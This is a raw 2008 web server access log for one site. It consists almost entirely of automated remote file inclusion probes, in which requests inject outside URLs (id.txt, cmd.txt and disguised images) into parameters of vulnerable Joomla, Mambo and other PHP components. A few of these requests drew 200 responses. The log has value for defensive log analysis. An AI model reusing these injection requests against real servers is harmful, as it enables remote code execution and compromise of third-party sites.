212.34.138.245 - - [28/May/2008:09:37:41 -0700] "GET /!scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.57.128.159 - - [28/May/2008:09:37:56 -0700] "GET /logs/access_080117.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.flat-bellies.com/brs/data/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:38:04 -0700] "GET /logs/access_080412.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:38:04 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:38:30 -0700] "GET /logs/access_080412.log/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:38:30 -0700] "GET /modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:38:31 -0700] "GET /logs/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:09:38:34 -0700] "GET /logs/index.php?incl=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.106.61 - - [28/May/2008:09:38:36 -0700] "GET /index.php?incl=http://nozyk.org/rob.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:38:43 -0700] "GET /logs/index.php?incl=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.243.253.159 - - [28/May/2008:09:38:43 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.167.156.20 - - [28/May/2008:09:38:45 -0700] "GET /index.php?incl=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:38:46 -0700] "GET /logs/access_080301.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [28/May/2008:09:38:50 -0700] "GET /logs/access_080301.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:38:54 -0700] "GET /logs/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:38:55 -0700] "GET /modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:09:38:57 -0700] "GET /logs/access_080209.log/!scanhttp://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:09:38:57 -0700] "GET /logs/!scanhttp://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.208.217.32 - - [28/May/2008:09:38:59 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:39:19 -0700] "GET /logs//tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:39:20 -0700] "GET //tools/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:39:22 -0700] "GET /logs/access_080227.log/!scanhttp://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:09:39:23 -0700] "GET /logs/protection.php?action=logout&siteurl=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
216.227.209.138 - - [28/May/2008:09:39:23 -0700] "GET /protection.php?action=logout&siteurl=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:09:39:32 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:09:39:32 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.phpspaw_root=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:09:40:06 -0700] "GET /logs//modules/My_eGallery/index.php?include_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [28/May/2008:09:40:06 -0700] "GET //modules/My_eGallery/index.php?include_path=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:40:23 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:40:23 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:09:40:27 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:09:40:27 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:40:31 -0700] "GET /logs/access_080327.log//claroline/phpbb/page_tail.php?includePath=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:40:40 -0700] "GET /logs/errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [28/May/2008:09:40:40 -0700] "GET /errors.php?error=http://www.kamablackbelt.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:40:42 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:40:43 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:40:45 -0700] "GET /logs/index.php?incl=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:40:47 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:40:47 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:40:47 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:40:49 -0700] "GET /index.php?incl=http://medisana.co.kr/test?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:40:53 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [28/May/2008:09:40:54 -0700] "GET /logs/index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [28/May/2008:09:40:57 -0700] "GET /index.php?incl=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:41:16 -0700] "GET /logs/access_080209.log/!scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:41:17 -0700] "GET /logs/!scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:41:24 -0700] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:41:24 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:41:25 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:41:36 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.230.197.245 - - [28/May/2008:09:41:36 -0700] "GET /logs/access_080227.log/!scanhttp://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:09:41:36 -0700] "GET /logs/access_080228.log//modules/vwar/admin/admin.php?vwar_root=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:41:37 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:41:37 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:41:37 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:41:39 -0700] "GET /logs/access_080310.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.202.82 - - [28/May/2008:09:41:43 -0700] "GET /logs/access_080327.log//index.php?option=com_custompages&cpage=http://www.gasthof-neumeister.com/images/zoom/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:09:41:44 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.0.18.81 - - [28/May/2008:09:41:49 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.mhstore.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:41:56 -0700] "GET /logs/access_080306.log//?index.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.23.140 - - [28/May/2008:09:41:59 -0700] "GET /logs/access_080201.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:43:03 -0700] "GET /logs/index.php?incl=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:43:06 -0700] "GET /index.php?incl=http://medisana.co.kr/test? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:43:09 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:43:10 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:43:53 -0700] "GET /logs/access.log//components/com_rsgallery/common/db.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:43:53 -0700] "GET //components/com_rsgallery/common/db.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:43:57 -0700] "GET /logs//components/com_rsgallery/common/db.php=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:43:59 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:44:00 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gsis.bogo.net/bbs/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.195 - - [28/May/2008:09:44:14 -0700] "GET /minamijewelry/html//index.php?_SERVER[DOCUMENT_ROOT]=http://www.catim.com/leg/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.195 - - [28/May/2008:09:44:16 -0700] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.catim.com/leg/on? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
212.34.138.245 - - [28/May/2008:09:44:20 -0700] "GET /logs/access_080227.log/!scanhttp://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.111.38 - - [28/May/2008:09:44:31 -0700] "GET /http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
85.17.111.38 - - [28/May/2008:09:44:31 -0700] "GET /logs/http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
81.173.19.23 - - [28/May/2008:09:44:39 -0700] "GET /http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.173.19.23 - - [28/May/2008:09:44:39 -0700] "GET /logs/http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.62.80.134 - - [28/May/2008:09:44:51 -0700] "GET /logs/http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
209.62.80.134 - - [28/May/2008:09:44:52 -0700] "GET /http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:45:05 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:09:45:05 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:45:05 -0700] "GET /http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
74.53.68.226 - - [28/May/2008:09:45:05 -0700] "GET /logs/http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:09:45:21 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:09:45:26 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:09:45:27 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.91.254.133 - - [28/May/2008:09:45:28 -0700] "GET /http://fadhilla.net/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:45:41 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:09:45:42 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:45:56 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:45:56 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.252.82 - - [28/May/2008:09:46:15 -0700] "GET /administrator/components/com_peoplebook/includes/dbal.include_dir=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:46:18 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
195.12.53.176 - - [28/May/2008:09:46:18 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:46:20 -0700] "GET /logs/access_080212.log/avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:46:20 -0700] "GET /avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:09:46:21 -0700] "GET /logs/avatar.php?page=http://www.bestpaket.ru/netcat//dump/nid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:22 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:23 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:23 -0700] "GET /logs/access_071016.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:46:53 -0700] "GET /logs/photo/update/update5.php?lang=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:46:53 -0700] "GET /photo/update/update5.php?lang=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:54 -0700] "GET /logs/access_080103.log//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.221.117.243 - - [28/May/2008:09:46:55 -0700] "GET /logs/access_080118.log//modify.php?dir_module=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:46:56 -0700] "GET /logs/access_080308.log/photo/update/update5.php?lang=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:46:56 -0700] "GET /photo/update/update5.php?lang=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:56 -0700] "GET //?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:46:56 -0700] "GET /logs/photo/update/update5.php?lang=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.203.190 - - [28/May/2008:09:46:57 -0700] "GET /logs//?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 200 49420 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:47:00 -0700] "GET /logs/access_080308.log/photo/update/update5.php?lang=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:47:00 -0700] "GET /photo/update/update5.php?lang=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [28/May/2008:09:47:01 -0700] "GET /logs/photo/update/update5.php?lang=http://www.hk-jeonjihyun.com/hk/egg/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.8.186 - - [28/May/2008:09:47:07 -0700] "GET /logs/access_080218.log/photo/update/update5.php?lang=http://www.iqmm.pt/modules/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
